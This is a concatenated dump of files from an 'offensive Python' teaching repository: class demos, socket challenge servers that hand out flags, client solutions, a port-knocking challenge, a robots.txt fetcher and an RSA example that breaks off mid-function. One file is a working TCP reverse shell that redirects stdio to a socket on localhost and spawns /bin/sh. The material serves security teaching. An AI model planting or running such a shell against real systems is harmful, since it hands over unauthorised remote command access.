        print(status)

    def stop(self):
        status = f'STOPPING -> {self.name}'
        print(status)
class IndustrialRobot(Robot):
    """Robot specialised with a work tool; overrides talk()."""

    def __init__(self, name, color, tool):
        super().__init__(name, color)
        self.tool = tool

    # Override method
    def talk(self):
        # Same greeting as Robot.talk, extended with the mounted tool.
        print(
            f"Hi Human! I'm {self.name} robot, have {self.color} color, type '{self.__class__.__name__}' and {self.tool} tool!")
class AIRobot(Robot):
    """Robot with an artificial brain; adds eliminate_humans()."""

    def __init__(self, name, color, brain):
        super().__init__(name, color)
        self.brain = brain

    # New method
    def eliminate_humans(self):
        print('Yeah! Just kill everyone!')
def main():
    """Exercise the Robot base class and its two subclasses."""
    print('[+] Using Robot base class [+]')
    # Creating instances
    robot_1 = Robot('George', 'red')
    robot_2 = Robot('Bob', 'blue')
    # Using methods
    robot_1.walk()
    robot_1.talk()
    robot_2.walk()
    robot_2.talk()
    robot_2.stop()
    robot_1.stop()
    # Accessing attributes
    print(robot_1.name)
    print(robot_2.name)
    print('\n[+] Using derived IndustrialRobot and AIRobot class [+]')
    # Creating instances
    industrial_robot = IndustrialRobot('Xpto', 'green', 'hammer')
    ai_robot = AIRobot('T1000', 'red', 'Neural circuit')
    # Using methods
    industrial_robot.walk()
    industrial_robot.talk()
    ai_robot.talk()
    ai_robot.walk()
    ai_robot.stop()
    industrial_robot.stop()
# Run the demo only when executed directly, not when imported.
if __name__ == "__main__":
    main()
|
dggsoares/Simple_Python_Exercises | exercises/exercises.py | import socketserver
import threading
import random
import base64
import logging
import coloredlogs
import sys
# Module logger with colored console output; all handlers below log through it.
logger = logging.getLogger(__name__)
coloredlogs.install(level='DEBUG',
                    logger=logger,
                    fmt='%(asctime)s %(hostname)s %(name)s[%(process)d] %(levelname)s %(message)s',
                    datefmt='%d-%m-%y %H:%M:%S',
                    stream=sys.stdout
                    )
# Pool of Zen-of-Python lines (PEP 20) used as challenge phrases / banners
# by the handler classes below.
ZEN_OF_PYTHON = [
    'Beautiful is better than ugly.',
    'Explicit is better than implicit.',
    'Simple is better than complex.',
    'Complex is better than complicated.',
    'Flat is better than nested.',
    'Sparse is better than dense.',
    'Readability counts.',
    "Special cases aren't special enough to break the rules.",
    'Although practicality beats purity.',
    'Errors should never pass silently.',
    'Unless explicitly silenced.',
    'In the face of ambiguity, refuse the temptation to guess.',
    'There should be one-- and preferably only one --obvious way to do it.',
    "Although that way may not be obvious at first unless you're Dutch.",
    'Now is better than never.',
    'Although never is often better than *right* now.',
    "If the implementation is hard to explain, it's a bad idea.",
    'If the implementation is easy to explain, it may be a good idea.',
    "Namespaces are one honking great idea -- let's do more of those!"
]
class Exercise(socketserver.BaseRequestHandler):
    """Common base class for all challenge request handlers."""

    def __init__(self, request, client_address, server):
        # BaseRequestHandler.__init__ stores the arguments and then runs
        # setup()/handle()/finish() on the subclass.
        super().__init__(request, client_address, server)
class Ex14(Exercise):
    """Challenge 1.4: echo server - client must send the expected phrase."""
    def __init__(self, request, client_address, server):
        self.name = 'Ex14'
        self.description = 'Echo Server with Sockets'
        self.welcome = '''\
 uuuuuuu
 uu$$$$$$$$$$$uu
 uu$$$$$$$$$$$$$$$$$uu
 u$$$$$$$$$$$$$$$$$$$$$u
 u$$$$$$$$$$$$$$$$$$$$$$$u
 u$$$$$$$$$$$$$$$$$$$$$$$$$u
 u$$$$$$$$$$$$$$$$$$$$$$$$$u
 u$$$$$$" "$$$" "$$$$$$u
 "$$$$" u$u $$$$"
 $$$u u$u u$$$
 $$$u u$$$u u$$$
 "$$$$uu$$$ $$$uu$$$$"
 "$$$$$$$" "$$$$$$$"
 u$$$$$$$u$$$$$$$u
 u$"$"$"$"$"$"$u
 uuu $$u$ $ $ $ $u$$ uuu
 u$$$$ $$$$$u$u$u$$$ u$$$$
 $$$$$uu "$$$$$$$$$" uu$$$$$$
 u$$$$$$$$$$$uu """"" uuuu$$$$$$$$$$
 $$$$"""$$$$$$$$$$uuu uu$$$$$$$$$"""$$$"
 """ ""$$$$$$$$$$$uu ""$"""
 uuuu ""$$$$$$$$$$uuu
 u$$$uuu$$$$$$$$$uu ""$$$$$$$$$$$uuu$$$
 $$$$$$$$$$"""" ""$$$$$$$$$$$"
 "$$$$$" ""$$$$""
 $$$" $$$$"
Enjoy Offensive Python!!!
EXERCISE 1.4 - Echo Server With Sockets
'''.encode()
        self.wrong = '''\
+---------------------------------------------+
| INCORRECT MESSAGE, TRY AGAIN! :( |
+---------------------------------------------+
'''.encode()
        self.correct = '''\
+---------------------------------------------+
| CORRECT MESSAGE! :) |
+---------------------------------------------+
| The Flag is: PYTHON{P1th0nH3llOFromS0CK3T$} |
+---------------------------------------------+
'''.encode()
        # NOTE(review): 'Hello Word!' (sic) - the companion client sends
        # 'Hello World!'; confirm whether the missing 'l' is a deliberate
        # trick or a typo.
        self.answer = 'Hello Word!'
        Exercise.__init__(self, request, client_address, server)
    def handle(self):
        # Client logging
        cur_thread = threading.currentThread().getName()
        client_ip, client_port = self.client_address
        logger.info(
            f'{self.name} | {client_ip}:{client_port} is connected in {cur_thread} on port: '
            f'{self.server.server_address[1]}')
        self.request.send(self.welcome)  # Welcome message
        data = self.request.recv(2048).decode()  # Client response
        # Exact string match decides the verdict.
        if data == self.answer:
            self.request.send(self.correct)
            logger.info(f'{self.name} | {client_ip}:{client_port}, CORRECT!')
        else:
            self.request.send(self.wrong)
            logger.info(f'{self.name} | {client_ip}:{client_port}, WRONG "{data}"')
        return
class Ex15(Exercise):
    """Challenge 1.5: client must Base64-decode a phrase and echo its first
    10 characters back."""
    def __init__(self, request, client_address, server):
        self.name = 'Ex15'
        self.description = 'Base64 Decode?'
        self.welcome = '''
 ---_ ......._-_--.
 (|\ / / /| \\
 / / .' -=-' `.
 / / .' )
 _/ / .' _.) /
 / o o _.-' / .'
 \ _.-' / .'*|
 \______.-'// .'.' \*|
 \| \ | // .'.' _ |*|
 ` \|// .'.'_ _ _|*|
 . .// .'.' | _ _ \*|
 \`-|\_/ / \ _ _ \*
 `/'\__/ \ _ _ \*
 /^| \ _ _ \*
 ' ` \ _ _ \*
 \ _ _\_
EXERCISE 1.5 - Base64 Decode?
'''.encode()
        self.wrong = '''\
+---------------------------------------------+
| INCORRECT MESSAGE, TRY AGAIN! :( |
+---------------------------------------------+
'''.encode()
        self.correct = '''\
+-------------------------------------------------+
| CORRECT MESSAGE! :) |
+-------------------------------------------------+
| The Flag is: PYTHON{P1th0nGr@tzf0rB@se64dec0d3} |
+-------------------------------------------------+
'''.encode()
        # Set per-connection by create_prhase().
        self.answer = ''
        Exercise.__init__(self, request, client_address, server)
    def handle(self):
        # Client logging
        cur_thread = threading.currentThread().getName()
        client_ip, client_port = self.client_address
        logger.info(
            f'{self.name} | {client_ip}:{client_port} is connected in {cur_thread} on port: '
            f'{self.server.server_address[1]}')
        self.request.send(self.welcome)
        self.request.send(self.create_prhase())  # Phrase challenge
        data = self.request.recv(1024).decode()  # Client response
        if data == self.answer:
            self.request.send(self.correct)
            logger.info(f'{self.name} | {client_ip}:{client_port}, CORRECT!')
        else:
            self.request.send(self.wrong)
            logger.info(f'{self.name} | {client_ip}:{client_port}, WRONG "{data}"')
        return
    def create_prhase(self):
        """Pick a random Zen line, remember its first 10 chars as the
        expected answer, and return the Base64-encoded full phrase."""
        phrase = random.choice(ZEN_OF_PYTHON)
        self.answer = phrase[:10]
        return base64.b64encode(phrase.encode())
class Ex16(Exercise):
    """Challenge 1.6: client must solve three arithmetic challenges in a row."""
    def __init__(self, request, client_address, server):
        self.name = 'Ex16'
        self.description = 'Math!'
        self.welcome = '''\
 _____
 .'/L|__`.
 / =[_]O|` \\
 |"+_____":|
 __:='|____`-:__
 ||[] ||====| []||
 ||[] | |=| | []||
 |:||_|=|U| |_||:|
 |:|||]_=_ =[_||:|
 | |||] [_][]C|| |
 | ||-'"""""`-|| |
 /|\\_\_|_|_/_//|\\
 |___| /|\ |___|
 `---' |___| `---'
 `---'
EXERCISE 1.6 - Math Using Sockets!
operators = ['+', '-', '*', '/']
'''.encode()
        self.wrong = '''\
+---------------------------------------------+
| INCORRECT MESSAGE, TRY AGAIN! :( |
+---------------------------------------------+
'''.encode()
        self.correct = '''\
+----------------------------------------------+
| CORRECT MESSAGE! :) |
+----------------------------------------------+
| The Flag is: PYTHON{P1th0nDoM@thwithS0ck3t$} |
+----------------------------------------------+
'''.encode()
        # Set per-challenge by create_challenge().
        self.answer = ''
        Exercise.__init__(self, request, client_address, server)
    def handle(self):
        # Client logging
        cur_thread = threading.currentThread().getName()
        client_ip, client_port = self.client_address
        logger.info(
            f'{self.name} | {client_ip}:{client_port} is connected in {cur_thread} on port: '
            f'{self.server.server_address[1]}')
        self.request.send(self.welcome)  # Welcome message
        self.request.send(self.create_challenge())  # First Challenge
        first_response = self.request.recv(1024).decode()  # Client response
        if first_response == self.answer:
            logger.info(f'{self.name} | {client_ip}:{client_port}, step 1 CORRECT!')
            self.request.send(self.create_challenge())  # Second challenge
            second_response = self.request.recv(1024).decode()  # Client response
            if second_response == self.answer:
                logger.info(f'{self.name} | {client_ip}:{client_port}, step 2 CORRECT!')
                self.request.send(self.create_challenge())  # Three challenge
                third_response = self.request.recv(1024).decode()  # Client response
                if third_response == self.answer:
                    logger.info(f'{self.name} | {client_ip}:{client_port}, step 3 CORRECT!')
                    self.request.send(self.correct)  # Correct answer for challenge
        else:
            self.request.send(self.wrong)
        return
    def create_challenge(self):
        """Build a random 'a&b&op' challenge and remember its answer.

        Returns the encoded expression to send to the client; the expected
        answer (str of the numeric result) is stored in self.answer.
        """
        # Dispatch table instead of eval() on a constructed string: same
        # results ('/' still yields a float, as eval('500/3') did), without
        # executing dynamically built code.
        operations = {
            '+': lambda x, y: x + y,
            '-': lambda x, y: x - y,
            '*': lambda x, y: x * y,
            '/': lambda x, y: x / y,
        }
        operators = ['+', '-', '*', '/']
        a = random.randint(1, 1000)
        b = random.randint(1, 1000)
        operator = random.choice(operators)
        self.answer = str(operations[operator](a, b))
        expression = f'{a}&{b}&{operator}'
        return expression.encode()
class SocketSample(Exercise):
    """Trivial handler: sends one random Zen-of-Python line and disconnects."""
    def __init__(self, request, client_address, server):
        self.name = 'SocketSample'
        self.description = 'Just a socket samples!'
        # Banner chosen once per connection, at handler construction time.
        self.welcome = random.choice(ZEN_OF_PYTHON).encode()
        Exercise.__init__(self, request, client_address, server)
    def handle(self):
        # Client logging
        cur_thread = threading.currentThread().getName()
        client_ip, client_port = self.client_address
        logger.info(
            f'{self.name} | {client_ip}:{client_port} is connected in {cur_thread} on port: '
            f'{self.server.server_address[1]}')
        self.request.send(self.welcome)  # Just send welcome message
        return
dggsoares/Simple_Python_Exercises | exercises_answer/ex_15_client.py | <reponame>dggsoares/Simple_Python_Exercises
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
import base64
# Client for challenge 1.5: decode the Base64 phrase from the server and
# answer with its first 10 characters.
HOST = 'py.insidertips.xyz'
PORT = 30030
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    # Banner
    print(s.recv(1024).decode())
    # Encoded data
    encoded_data = s.recv(1024)
    print(f'[+] Encoded data : {encoded_data}')
    # Decoded data
    decode_data = base64.b64decode(encoded_data)
    print(f'[+] Decoded data : {decode_data}')
    # Send first 10 characters from decoded data
    slice_decoded_data = decode_data[:10]
    s.send(slice_decoded_data)
    print(f'[+] Slice decoded data : {slice_decoded_data}\n')
    # Receive response
    data = s.recv(1024).decode()
    print(data)
dggsoares/Simple_Python_Exercises | python_101/12.3 - sockets_star_wars.py | <filename>python_101/12.3 - sockets_star_wars.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
# Stream the ASCII-art Star Wars telnet service to stdout indefinitely.
HOST = 'towel.blinkenlights.nl'
PORT = 23
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    # Loop forever; recv() returns b'' on disconnect, which decodes to ''.
    while True:
        print(s.recv(1024).decode(), end='')
|
dggsoares/Simple_Python_Exercises | python_201/11 - simple_tcp_reverse_shell.py | <filename>python_201/11 - simple_tcp_reverse_shell.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
import subprocess
import os
# Educational TCP reverse-shell demo against a local listener: duplicate the
# socket fd onto stdin/stdout/stderr, then spawn an interactive shell.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 5689))
# fd 0/1/2 = stdin/stdout/stderr, all redirected over the socket.
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(['/bin/sh', '-i'])
|
dggsoares/Simple_Python_Exercises | python_101/09 - functions.py | <reponame>dggsoares/Simple_Python_Exercises
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
def do_print(string):
    """Print *string* to stdout (thin wrapper used by the demo below)."""
    print(string)
# Exercise do_print() with a literal and an evaluated expression.
print(f'Function do_print(string):')
do_print(f'Testing functions on Python')
do_print(f'5 + 6 = {5 + 6}')
def add_numbers(x, y):
    """Return the sum of *x* and *y*."""
    return x + y
# Exercise add_numbers(). (Second label says '3 + 4' but 7 and 8 are passed.)
print('\nFunction add_numbers(x, y):')
print(f'2 + 4 = {add_numbers(2, 4)}')
print(f'3 + 4 = {add_numbers(7, 8)}')
def do_math(a, b, operator):
    """Apply *operator* ('+', '-', '*', '/') to a and b.

    Returns the numeric result ('/' gives a float), or None when the
    operator is not one of the four supported symbols - matching the
    original implicit-None fall-through.
    """
    operations = {
        '+': lambda x, y: x + y,
        '-': lambda x, y: x - y,
        '*': lambda x, y: x * y,
        '/': lambda x, y: x / y,
    }
    func = operations.get(operator)
    if func is not None:
        return func(a, b)
    return None
# Exercise do_math() with each supported operator.
print('\nFunction do_math(a, b, operator):')
a = 34
b = 21
print(f'[+] Addition: {a} + {b} = {do_math(a, b, "+")}')
print(f'[+] Division: {a} / {b} = {do_math(a, b, "/")}')
print(f'[+] Subtraction: {a} - {b} = {do_math(a, b, "-")}')
print(f'[+] Multiplication: {a} * {b} = {do_math(a, b, "*")}')
def main():
    """Entry point used when the module is executed directly."""
    print('Main Method!')
# Standard script guard: run main() only when executed, not when imported.
if __name__ == '__main__':
    main()
|
dggsoares/Simple_Python_Exercises | python_101/02.1 - strings.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Strings
# Demonstrates the four string-literal quoting styles.
print('------------ Building Strings ------------')
string1 = 'This is a string. We built in single quotes'
string2 = "This is also a string. We built in double quotes"
string3 = '''
This is built using triple quotes,
so it can span
multiple lines
'''
string4 = """
This is built using triple double-quotes,
so it can span
multiple lines too.
"""
print(string1)
print(string2)
print(string3)
print(string4)
print('--------------------------------------------')
print()
# Formatting Strings
# Shows %-formatting, str.format (positional, indexed, keyword) and f-strings.
print('------------ Formatting strings ------------')
name = 'John'
last_name = 'Williams'
print('Hi, %s!' % name)
print('Hi {} {}!'.format(name, last_name))
print('Hi {1} {0}!'.format(last_name, name))
# Note: indices are swapped relative to the argument order here, so this
# prints "Hi Williams John!".
print('Hi {1} {0}!'.format(name, last_name))
print('Hi {name} {last_name}!'.format(name=name, last_name=last_name))
print(f'Hi {name} {last_name}!!')
print('--------------------------------------------')
print()
# String slicing
# str[start:end]
print('-------------- String slicing --------------')
str1 = 'String slicing'
str2 = "Special cases aren't special enough to break the rules."
print(f'List from str1: {list(str1)}')
print(f'Character in "str2" at position 0: {str2[0]}')
# NOTE(review): label says "position 0" but str2[3] is printed - the label
# looks wrong.
print(f'Character at "str2" position 0: {str2[3]}')
print(f'str2[:10]: {str2[:10]}')
print(f'str2[8:]: {str2[8:]}')
print(f'Extract "cases" word (positive index): {str2[8:13]}')
print(f'Extract "break" word (negative index): {str2[-16:-11]}')
for index, character in enumerate(str2):
    print(f'{index} : {character}')
print(list(enumerate(str1)))
dggsoares/Simple_Python_Exercises | python_101/06 - if_statements.py | <filename>python_101/06 - if_statements.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Demonstrates if / if-else / if-elif-else chains.
run = True
if run:
    print("I'm running!")
sleep = False
if sleep:
    print("I'm sleeping!")
else:
    print("I'm not sleeping!")
aux = 9
if aux == 15:
    print('"Aux" equals 15')
elif aux == 14:
    print('"Aux" equals 14')
# Range test; chained comparison (10 <= aux <= 12) would be equivalent.
elif aux <= 12 and aux >= 10:
    print('"Aux" is between 10 and 12')
else:
    print('"Aux" is under 10')
dggsoares/Simple_Python_Exercises | knockd/knockd_server.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import time
import logging
import coloredlogs
import sys
import socketserver
import threading
# Module logger with colored console output, shared by the server below.
logger = logging.getLogger(__name__)
coloredlogs.install(level='DEBUG',
                    logger=logger,
                    fmt='%(asctime)s %(hostname)s %(name)s[%(process)d] %(levelname)s %(message)s',
                    datefmt='%d-%m-%y %H:%M:%S',
                    stream=sys.stdout
                    )
class KnockdServer(socketserver.BaseRequestHandler):
    """Handler for the knockd challenge: sends a congratulations banner to
    any client that reached the port (i.e. knocked correctly)."""
    def __init__(self, request, client_address, server):
        self.name = 'Knockd Challenge'
        self.welcome = '''
 u
 . x!X
 ."X M~~>
 d~~XX~~~k .u.xZ `\ \ "%
 d~~~M!~~~?..+"~~~~~?: " h
 '~~~~~~~~~~~~~~~~~~~~~? `
 4~~~~~~~~~~~~~~~~~~~~~~> '
 ':~~~~~~~~~~(X+"" X~~~~> xHL
 %~~~~~(X=" 'X"!~~% :RMMMRMRs
 ^"*f` ' (~~~~~MMMMMMMMMMMx
 f /` % !~~~~~MMMMMMMMMMMMMc
 F ? ' !~~~~~!MMMMMMMMMMMMMM.
 ' . :": " : !X""(~~?MMMMMMMMMMMMMMh
 'x .~ ^-+=" ? "f4!* #MMMMMMMMMMMMMM.
 /" .." `MMMMMMMMMMMMMM
 h .. ' #MMMMMMMMMMMM
 f ' @MMMMMMMMMMM
 : .:="" > dMMMMMMMMMMMMM
 "+mm+=~(" RR @MMMMMMMMMMMMM"
 % (MMNmHHMMMMMMMMMMMMMMF
 uR5 @MMMMMMMMMMMMMMMMMMMF
 dMRMM> dMMMMMMMMMMMMMMMMMMMF
 RM$MMMF=x..=" RMRM$MMMMMMMMMMMMMMF
 MMMMMMM 'MMMMMMMMMMMMMMMMMMF
 dMMRMMMK 'MMMMMMMMMMMMMMMMM"
 RMMRMMME 3MMMMMMMMMMMMMMMM
 @MMMMMMM> 9MMMMMMMMMMMMMMM~
 'MMMMMMMM> 9MMMMMMMMMMMMMMF
 tMMMMMMMM 9MMMMMMMMMMMMMM
 MMMM$MMMM 9MMMMMMMMMMMMMM
 'MMMMRMMMM 9MMMMMMMMMMMMM9
 MMMMMMMMMM 9MMMMMMMMMMMMMM
 RMMM$MMMMM 9MMMMMMMMMMMMMM
 tMMMMMMMMMM 9MMMMMMMMMMMMMX
 RMMMMMMMMMM 9MMMMMMMMMMMMME
 JMMMMMMMMMMM MMMMMMMMMMMMMME
 9MMMM$MMMMMM RMMMMMMMMMMMMME
 MMMMMRMMMMMX RMMMMMMMMMMMMMR
 RMMMMRMMMMME EMMMMMMMMMMMMM!
 9MMMMMMMMMME MMMMMMMMMMMMMM>
 [+] KNOCKD CHALLENGE [+] {
 YOU DID IT!
 CONGRATULATIONS!
 }
 '''.encode()
        socketserver.BaseRequestHandler.__init__(self, request, client_address, server)
        return
    def handle(self):
        # Client logging
        cur_thread = threading.currentThread().getName()
        client_ip, client_port = self.client_address
        logger.info(
            f'{self.name} | {client_ip}:{client_port} is connected in {cur_thread} on port: '
            f'{self.server.server_address[1]}')
        self.request.send(self.welcome)  # Just send welcome message
        return
class CustomTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """Threaded TCP server with address reuse and daemonic handler threads."""

    # These flags must be in effect before __init__ runs: TCPServer.__init__
    # calls server_bind(), which reads allow_reuse_address to decide whether
    # to set SO_REUSEADDR.  The original assigned them on the *base classes*
    # after __init__ had already bound the socket, so the first server was
    # created without SO_REUSEADDR (and the assignment mutated global state).
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, server_address, handler_class):
        socketserver.TCPServer.__init__(self, server_address, handler_class)
def create_server_exercise(port, exercise):
    """Start a threaded TCP server for *exercise* on *port*.

    The server runs in a daemon thread, so it dies with the main process.
    """
    custom_tcp_servers = []
    custom_tcp_servers_threads = []
    server = CustomTCPServer(('', port), exercise)
    custom_tcp_servers.append(server)
    thread = threading.Thread(target=server.serve_forever)
    thread.daemon = True
    thread.start()
    custom_tcp_servers_threads.append(thread)
    logger.debug(f'{len(custom_tcp_servers_threads)} threads is running on port: {port}')
if __name__ == '__main__':
    # Start the challenge server, then idle in the main thread; the daemon
    # server thread exits automatically on Ctrl-C.
    create_server_exercise(6667, KnockdServer)
    while True:
        try:
            time.sleep(1)
        except KeyboardInterrupt as e:
            logger.info('Shutting down servers...')
            sys.exit(0)
|
dggsoares/Simple_Python_Exercises | python_201/02 - requests_library.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
URL = "https://www.us-cert.gov/ncas/alerts/2014"

# Fetch the 2014 alerts index page and parse it with BeautifulSoup.
r = requests.get(url=URL)
soup = BeautifulSoup(r.text, 'html.parser')

# Each alert is an <li> inside the .item-list <ul>.
alerts = soup.select('.item-list ul li')
for alert in alerts:
    # Renamed from `id`, which shadowed the id() builtin.
    alert_id = alert.find('span', {'class': 'document_id'}).string
    title = alert.find('span', {'class': 'document_title'}).string
    print(alert_id + title)
print(f'Total Alerts: {len(alerts)}')
dggsoares/Simple_Python_Exercises | exercises/ex1_server.py | import time
from exercises import *
import logging
import coloredlogs
import sys
# Module logger with colored console output, shared by the servers below.
logger = logging.getLogger(__name__)
coloredlogs.install(level='DEBUG',
                    logger=logger,
                    fmt='%(asctime)s %(hostname)s %(name)s[%(process)d] %(levelname)s %(message)s',
                    datefmt='%d-%m-%y %H:%M:%S',
                    stream=sys.stdout
                    )
class CustomTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """Threaded TCP server with address reuse and daemonic handler threads."""

    # These flags must be in effect before __init__ runs: TCPServer.__init__
    # calls server_bind(), which reads allow_reuse_address to decide whether
    # to set SO_REUSEADDR.  The original assigned them on the *base classes*
    # after __init__ had already bound the socket, so the first server was
    # created without SO_REUSEADDR (and the assignment mutated global state).
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, server_address, handler_class):
        socketserver.TCPServer.__init__(self, server_address, handler_class)
def create_server_exercise(start, end, exercise):
    """Start one threaded TCP server per port in [start, end] for *exercise*.

    Each server runs in a daemon thread, so they all die with the process.
    """
    custom_tcp_servers = []
    custom_tcp_servers_threads = []
    # range end is +1 so the `end` port itself is included.
    for port in range(start, end + 1):
        server = CustomTCPServer(('', port), exercise)
        custom_tcp_servers.append(server)
        thread = threading.Thread(target=server.serve_forever)
        thread.daemon = True
        thread.start()
        custom_tcp_servers_threads.append(thread)
    logger.debug(f'{len(custom_tcp_servers_threads)} threads is running on ports: {start}-{end}')
if __name__ == '__main__':
    # One port range per exercise handler, then idle until Ctrl-C; the
    # daemonic server threads exit with the process.
    create_server_exercise(30000, 30010, Ex14)
    create_server_exercise(30020, 30030, Ex15)
    create_server_exercise(30040, 30050, Ex16)
    create_server_exercise(45000, 45010, SocketSample)
    while True:
        try:
            time.sleep(1)
        except KeyboardInterrupt as e:
            logger.info('Shutting down servers...')
            sys.exit(0)
|
dggsoares/Simple_Python_Exercises | exercises_answer/ex_21.py | <filename>exercises_answer/ex_21.py<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
from pprint import pprint
# Fetch and print /robots.txt for every IP listed in exercise21.txt.
with open('exercise21.txt', 'r') as file:
    for ip in file:
        ip = ip.replace('\n', '')
        url = f'http://{ip}/robots.txt'
        print(f'\n[+] ---- {ip} robots.txt content ---- [+]')
        # 1-second timeout keeps the scan moving past dead hosts.
        try:
            r = requests.get(url, timeout=1)
            pprint(r.text)
        except requests.Timeout as e:
            print(f'\t[ERROR] {ip} TIMEOUT ERROR [ERROR]')
        print(f'[+] --------------------------------- [+]')
|
dggsoares/Simple_Python_Exercises | python_101/05 - list_plus_dictionaries.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# List of dicts: one record per target host, printed as a formatted report.
targets = [
    {'ip': "192.168.3.11", 'real_location': 'Virginia', 'keyfile': 'key_USA.pem', 'services': ['HTTP', 'SQL Server']},
    {'ip': "172.16.58.3", 'real_location': 'Ohio', 'keyfile': 'key_USA_OHIO.pem', 'services': ['DHCP', 'GIT']},
    {'ip': "172.16.58.3", 'real_location': 'Virginia', 'keyfile': 'key_USA.pem', 'services': ['RPC', 'NTP']},
    {'ip': "192.168.3.11", 'real_location': 'London', 'keyfile': 'key_LONDON.pem', 'services': ['SMTP', 'DNS']},
    {'ip': "172.16.31.10", 'real_location': 'São Paulo', 'keyfile': 'key_BR.pem', 'services': ['HTTP', 'Netbios']},
    {'ip': "192.168.127.12", 'real_location': 'Seoul', 'keyfile': 'key_SEOUL.pem', 'services': ['SSH', 'SCP']},
    {'ip': "192.168.3.11", 'real_location': 'Syndey', 'keyfile': 'key_AUS.pem', 'services': ['FTP', 'HTTPS']}
]
# Multi-line f-string keeps the report layout in one literal per target.
for target in targets:
    print(f'''
    [+] IP: {target["ip"]}
     (-) Location: {target["real_location"]}
     (-) Pub Key File: {target["keyfile"]}
     (-) Services: {target["services"]}
    '''
          )
dggsoares/Simple_Python_Exercises | samples/socketserver_echo_thread.py | # https://pymotw.com/3/socketserver/
import logging
import socketserver
import threading
# Root logger at DEBUG so every server/handler hook below is traced.
logging.basicConfig(level=logging.DEBUG, format='%(name)s: %(message)s', )
class EchoRequestHandler(socketserver.BaseRequestHandler):
    """Echo handler that logs every lifecycle hook (from pymotw.com demo)."""
    def __init__(self, request, client_address, server):
        self.logger = logging.getLogger('EchoRequestHandler')
        self.logger.debug('__init__')
        socketserver.BaseRequestHandler.__init__(self, request, client_address, server)
        return
    def setup(self):
        # Called by the base class before handle().
        self.logger.debug('setup')
        return socketserver.BaseRequestHandler.setup(self)
    def handle(self):
        # Echo the received data back, prefixed with the handling thread name.
        self.logger.debug('handle')
        data = self.request.recv(2048).decode()
        cur_thread = threading.currentThread()
        response = f'\n\tThread: {cur_thread.getName()} {data}'.encode()
        self.logger.debug(f'recv()->"{data}"')
        self.logger.debug(f'answer: "{response}"')
        self.request.send(response)
        return
    def finish(self):
        # Called by the base class after handle(), even on error.
        self.logger.debug('finish')
        return socketserver.BaseRequestHandler.finish(self)
class EchoServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """Threaded TCP echo server that logs each TCPServer hook before
    delegating to the base implementation (instructional wrapper)."""
    def __init__(self, server_address,
                 handler_class=EchoRequestHandler,
                 ):
        self.logger = logging.getLogger('EchoServer')
        self.logger.debug('__init__')
        socketserver.TCPServer.__init__(self, server_address, handler_class)
        return
    def server_activate(self):
        self.logger.debug('server_activate')
        socketserver.TCPServer.server_activate(self)
        return
    def serve_forever(self, poll_interval=0.5):
        self.logger.debug('waiting for request')
        self.logger.info('Handling requests, press <Ctrl-C> to quit')
        socketserver.TCPServer.serve_forever(self, poll_interval)
        return
    def handle_request(self):
        self.logger.debug('handle_request')
        return socketserver.TCPServer.handle_request(self)
    def verify_request(self, request, client_address):
        self.logger.debug('verify_request(%s, %s)', request, client_address)
        return socketserver.TCPServer.verify_request(self, request, client_address, )
    def process_request(self, request, client_address):
        self.logger.debug('process_request(%s, %s)', request, client_address)
        return socketserver.TCPServer.process_request(self, request, client_address, )
    def server_close(self):
        self.logger.debug('server_close')
        return socketserver.TCPServer.server_close(self)
    def finish_request(self, request, client_address):
        self.logger.debug('finish_request(%s, %s)', request, client_address)
        return socketserver.TCPServer.finish_request(self, request, client_address, )
    def close_request(self, request_address):
        self.logger.debug('close_request(%s)', request_address)
        return socketserver.TCPServer.close_request(self, request_address, )
    def shutdown(self):
        self.logger.debug('shutdown()')
        return socketserver.TCPServer.shutdown(self)
if __name__ == '__main__':
    address = ('localhost', 30001)  # let the kernel assign a port
    server = EchoServer(address, EchoRequestHandler)
    # Blocking variant; the commented-out lines below show the alternative
    # of running the server loop in a background daemon thread.
    server.serve_forever()
    # ip, port = server.server_address  # what port was assigned?
    # # Start the server in a thread
    # t = threading.Thread(target=server.serve_forever)
    # t.setDaemon(True)  # don't hang on exit
    # t.start()
    # print(f'Server loop running in thread: {t.getName()}')
|
dggsoares/Simple_Python_Exercises | python_201/05.1 - rsa_encryption.py | <reponame>dggsoares/Simple_Python_Exercises
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
import base64
def write_keys_on_disk(private_key, public_key):
    """Serialize the RSA key pair as PEM files in the working directory.

    The private key is written UNENCRYPTED (NoEncryption) to
    private_key.pem; the public key goes to public_key.pem.
    """
    pem_private = private_key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.PKCS8,
        encryption_algorithm=serialization.NoEncryption()
    )
    pem_public = public_key.public_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PublicFormat.SubjectPublicKeyInfo
    )
    with open('private_key.pem', 'wb') as f:
        f.write(pem_private)
    with open('public_key.pem', 'wb') as f:
        f.write(pem_public)
def load_keys_from_disk():
    """Load the PEM key pair previously written by write_keys_on_disk().

    Returns:
        (private_key, public_key) tuple.
    """
    with open("private_key.pem", "rb") as key_file:
        # password=None: write_keys_on_disk() serializes the private key with
